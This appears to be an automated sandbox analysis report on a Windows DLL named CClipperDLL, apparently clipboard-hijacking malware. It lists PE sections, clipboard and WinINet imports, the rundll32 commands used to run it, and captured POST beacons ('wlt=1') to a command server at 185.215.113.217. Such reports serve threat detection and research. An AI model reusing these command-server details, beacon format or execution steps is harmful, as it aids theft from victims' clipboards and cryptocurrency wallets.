xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebx+04h], esi
or eax, edi
or eax, dword ptr [ebp-08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ccd0	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cd6c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21000	0x1af8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1bb44	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1bb80	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14306	0x14400	ec6930cef6de108017a4ccb80ee1920e	False	0.5099223572530864	data	6.542510204253566	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x74ea	0x7600	30940b68ded5193f2114448cb8d0c6bc	False	0.4288268008474576	data	5.152147630733541	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1fec	0x1400	070ceab71158e4b98b9fbb2974a658d3	False	0.094140625	data	1.5445177251659354	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x20000	0xf8	0x200	9f59a1f7f3b6dfefbfe8605086b5888e	False	0.333984375	data	2.5080557656497993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21000	0x1af8	0x1c00	08f7780a782a129fa8fb316247ea649c	False	0.75390625	data	6.517798709045728	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x20060	0x91	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.8689655172413793

Imports

DLL	Import
KERNEL32.dll	GlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
USER32.dll	EmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
WININET.dll	InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle

Exports

Name	Ordinal	Address
??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	1	0x10001d60
??4CClipperDLL@@QAEAAV0@ABV0@@Z	2	0x10001d60
Main	3	0x100059a0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:13:50.847470999 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:50.853457928 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:50.853535891 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:50.853724003 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:50.859653950 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:51.898665905 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:51.898730040 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:53.891271114 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:53.897099018 CEST	80	49705	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:53.897316933 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:53.897411108 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:13:53.903260946 CEST	80	49705	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:54.925247908 CEST	80	49705	185.215.113.217	192.168.2.5
Oct 26, 2024 19:13:54.925414085 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:07.517287970 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:15:07.517404079 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:15:07.517537117 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:15:07.517611027 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:07.517611027 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:10.089392900 CEST	80	49705	185.215.113.217	192.168.2.5
Oct 26, 2024 19:15:10.089471102 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:40.781274080 CEST	49704	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:40.786643028 CEST	80	49704	185.215.113.217	192.168.2.5
Oct 26, 2024 19:15:43.842576027 CEST	49705	80	192.168.2.5	185.215.113.217
Oct 26, 2024 19:15:43.848074913 CEST	80	49705	185.215.113.217	192.168.2.5

HTTP Request Dependency Graph

185.215.113.217

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.217	80	6616	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 19:13:50.853724003 CEST	157	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.217 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Oct 26, 2024 19:13:51.898665905 CEST	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 17:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 35 63 32 34 64 36 34 66 37 36 62 64 39 32 66 61 62 66 64 37 36 61 66 61 39 37 33 65 31 36 62 38 66 31 32 36 36 63 35 33 38 39 64 61 62 33 30 33 30 34 65 30 36 36 61 35 31 30 32 33 30 62 38 66 30 34 65 33 65 31 33 31 64 31 35 63 2d 31 2d 5f 32 5f 63 66 32 34 38 64 34 37 30 64 30 35 38 33 34 38 36 32 66 61 63 33 66 35 62 63 39 65 33 61 66 62 61 65 36 66 35 36 66 64 61 63 31 30 33 38 37 35 64 63 65 39 66 31 34 37 35 62 39 61 32 61 65 36 32 37 37 62 35 36 63 66 35 62 65 31 66 37 33 65 38 61 35 30 2d 32 2d 5f 33 5f 62 33 30 65 38 65 34 62 31 62 37 32 38 39 35 65 36 30 66 63 62 33 38 31 62 39 65 36 34 61 62 64 61 36 33 64 31 39 62 38 66 38 33 31 33 61 35 31 38 39 64 64 61 38 32 33 31 34 38 66 34 61 65 36 30 30 32 39 2d 33 2d 5f 34 5f 62 62 30 65 61 66 31 32 32 30 30 37 63 61 34 32 37 34 39 38 63 36 62 35 65 32 66 32 37 64 38 61 38 63 30 64 33 32 38 64 64 38 31 32 36 65 30 32 62 64 66 31 62 66 32 36 32 64 38 66 34 34 62 36 31 34 33 33 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd8025c24d64f76bd92fabfd76afa973e16b8f1266c5389dab30304e066a510230b8f04e3e131d15c-1-_2_cf248d470d05834862fac3f5bc9e3afbae6f56fdac103875dce9f1475b9a2ae6277b56cf5be1f73e8a50-2-_3_b30e8e4b1b72895e60fcb381b9e64abda63d19b8f8313a5189dda823148f4ae60029-3-_4_bb0eaf122007ca427498c6b5e2f27d8a8c0d328dd8126e02bdf1bf262d8f44b61433-4-_5_cb6ad144382aee4a478bc2f9eff033be851a259cf334425adcf9bf27598f6d9a0e270fbd2ee7a049ae3f156d8f4f285c56a998072a6d6ea1e95d2391e7e2c8ccafb8cc53d94db10c005f7143e92dd5382db4027f701de48ff439232175095e-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.215.113.217	80	5688	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 19:13:53.897411108 CEST	157	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.217 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Oct 26, 2024 19:13:54.925247908 CEST	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 17:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 35 63 32 34 64 36 34 66 37 36 62 64 39 32 66 61 62 66 64 37 36 61 66 61 39 37 33 65 31 36 62 38 66 31 32 36 36 63 35 33 38 39 64 61 62 33 30 33 30 34 65 30 36 36 61 35 31 30 32 33 30 62 38 66 30 34 65 33 65 31 33 31 64 31 35 63 2d 31 2d 5f 32 5f 63 66 32 34 38 64 34 37 30 64 30 35 38 33 34 38 36 32 66 61 63 33 66 35 62 63 39 65 33 61 66 62 61 65 36 66 35 36 66 64 61 63 31 30 33 38 37 35 64 63 65 39 66 31 34 37 35 62 39 61 32 61 65 36 32 37 37 62 35 36 63 66 35 62 65 31 66 37 33 65 38 61 35 30 2d 32 2d 5f 33 5f 62 33 30 65 38 65 34 62 31 62 37 32 38 39 35 65 36 30 66 63 62 33 38 31 62 39 65 36 34 61 62 64 61 36 33 64 31 39 62 38 66 38 33 31 33 61 35 31 38 39 64 64 61 38 32 33 31 34 38 66 34 61 65 36 30 30 32 39 2d 33 2d 5f 34 5f 62 62 30 65 61 66 31 32 32 30 30 37 63 61 34 32 37 34 39 38 63 36 62 35 65 32 66 32 37 64 38 61 38 63 30 64 33 32 38 64 64 38 31 32 36 65 30 32 62 64 66 31 62 66 32 36 32 64 38 66 34 34 62 36 31 34 33 33 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd8025c24d64f76bd92fabfd76afa973e16b8f1266c5389dab30304e066a510230b8f04e3e131d15c-1-_2_cf248d470d05834862fac3f5bc9e3afbae6f56fdac103875dce9f1475b9a2ae6277b56cf5be1f73e8a50-2-_3_b30e8e4b1b72895e60fcb381b9e64abda63d19b8f8313a5189dda823148f4ae60029-3-_4_bb0eaf122007ca427498c6b5e2f27d8a8c0d328dd8126e02bdf1bf262d8f44b61433-4-_5_cb6ad144382aee4a478bc2f9eff033be851a259cf334425adcf9bf27598f6d9a0e270fbd2ee7a049ae3f156d8f4f285c56a998072a6d6ea1e95d2391e7e2c8ccafb8cc53d94db10c005f7143e92dd5382db4027f701de48ff439232175095e-5-0

Target ID:	0
Start time:	13:13:43
Start date:	26/10/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Imagebase:	0x9b0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:13:43
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:13:43
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:13:43
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:13:43
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:13:46
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:13:49
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:13:52
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:13:52
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:13:52
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Imagebase:	0xf90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	736
Total number of Limit Nodes:	22

Executed Functions

Function 6FB91EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6FB91EC5

Part of subcall function 6FB96751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6FB9675D

InternetOpenW.WININET(6FBABA14,00000000,00000000,00000000,00000000), ref: 6FB91FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6FB91FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6FB91FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6FB92031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6FB9204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6FB9224B
InternetCloseHandle.WININET(00000000), ref: 6FB92266
InternetCloseHandle.WININET(?), ref: 6FB9226E
InternetCloseHandle.WININET(?), ref: 6FB92276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6FB91F71
string too long, xrefs: 6FB91EC0
POST, xrefs: 6FB91FF2

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
API String ID: 4066372336-370044323
Opcode ID: 4307e206b97c8c6cccd1fef2bed9f4055441df59edf2ce7ab19744ffd76258e1
Instruction ID: 1951f8bb7ad7231e1a953788a0250b22e2eef4f67957806707e1fc655f13c8d0
Opcode Fuzzy Hash: 4307e206b97c8c6cccd1fef2bed9f4055441df59edf2ce7ab19744ffd76258e1
Instruction Fuzzy Hash: CFF183B0A001589FEB25CF28DC54B9DBBB5EF46304F5041E9E608AB2C1D7759AC4CF95

Function 6FB931B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+++, xrefs: 6FB93B4B
wlt=1, xrefs: 6FB93ADA
abcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6FB9357D

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
API String ID: 0-2251221455
Opcode ID: 19960814e2c19478e077eb5a2b2e7d1ae9fdd001d3a7a2565306006535361fc0
Instruction ID: 7df0878884fc3e7e1ef90e433190a1feb76ee57b0131ec8cde8bc297bd2fcd72
Opcode Fuzzy Hash: 19960814e2c19478e077eb5a2b2e7d1ae9fdd001d3a7a2565306006535361fc0
Instruction Fuzzy Hash: C5F11A70A00288EFEB04CF69DC55B9EBBB9FF46714F14422DE815A73C0DB75A9448BA1

Function 6FB91ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(6FBABA14,00000000,00000000,00000000,00000000), ref: 6FB91FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6FB91FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6FB91FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6FB92031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6FB9204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6FB9224B
InternetCloseHandle.WININET(00000000), ref: 6FB92266
InternetCloseHandle.WININET(?), ref: 6FB9226E
InternetCloseHandle.WININET(?), ref: 6FB92276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6FB91F71
POST, xrefs: 6FB91FF2

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: Content-Type: application/x-www-form-urlencoded$POST
API String ID: 1354133546-2387545335
Opcode ID: 2394a75b5967b6a38b2e88eae64c2df8001b108247f5f281b1913279b2610f37
Instruction ID: 8a417987f7edf2e42fbd3cc595816e89ecbbdcac48547a3050354bda43412a37
Opcode Fuzzy Hash: 2394a75b5967b6a38b2e88eae64c2df8001b108247f5f281b1913279b2610f37
Instruction Fuzzy Hash: E7F182B0A001589FEB25CF28DC94B9DBBB6EF46304F5041E9E608AB2C1D7759AC4CF95

Function 6FB96E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6FB96EC1
___scrt_uninitialize_crt.LIBCMT ref: 6FB96EDB

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 94c5f8e5fa957dd5291937e4ae9e760f5ecd4561f0c602d43a4f178ba49a237c
Instruction ID: 6a51e049ff3d76a972c2f136f61d38869838ef68e3698b7ee9e38b8d1b4e42ff
Opcode Fuzzy Hash: 94c5f8e5fa957dd5291937e4ae9e760f5ecd4561f0c602d43a4f178ba49a237c
Instruction Fuzzy Hash: 0E41D972D047D8AFDB218F65ED40BAE3BB6EF477A4F10413AE81497280D77059019BD0

Function 6FB96F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6FB96F69
dllmain_crt_dispatch.LIBCMT ref: 6FB96F80
dllmain_raw.LIBCMT ref: 6FB96FC8
dllmain_crt_dispatch.LIBCMT ref: 6FB96FDB
dllmain_raw.LIBCMT ref: 6FB96FEE

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 2567ee9368fad7a3c9bb8b458e39211994b2f20ca5aad192935c015134c9d5c7
Instruction ID: 41ff49b33b76a3cb44df7c5a0ed941bff11a6a8756efb220436602ec4c5f61f5
Opcode Fuzzy Hash: 2567ee9368fad7a3c9bb8b458e39211994b2f20ca5aad192935c015134c9d5c7
Instruction Fuzzy Hash: A4218371D006ADABDB218F15ED40AAF3ABAEF87B94F114136F8149B250D7719D019BE0

Function 6FB9B423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B428
_free.LIBCMT ref: 6FB9B485
_free.LIBCMT ref: 6FB9B4BB
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B4C6

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ab2d219c4d7a55141ad4675b8aa92c96e6233b20db21576ed0adacddd8f1961b
Instruction ID: f9549d98a05118898314118da0f14f1194927a5ee2255fefe9f34a7364df484e
Opcode Fuzzy Hash: ab2d219c4d7a55141ad4675b8aa92c96e6233b20db21576ed0adacddd8f1961b
Instruction Fuzzy Hash: E6110832604B806ADA101A7BBDA2F5E366ADFC7778B248234F534972C1DF218A225221

Function 6FB96D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6FB96DC0

Part of subcall function 6FB97490: InitializeSListHead.KERNEL32(6FBAF718,6FB96DCA,6FBAC770,00000010,6FB96D5B,?,?,?,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8), ref: 6FB97495

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FB96E2A

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
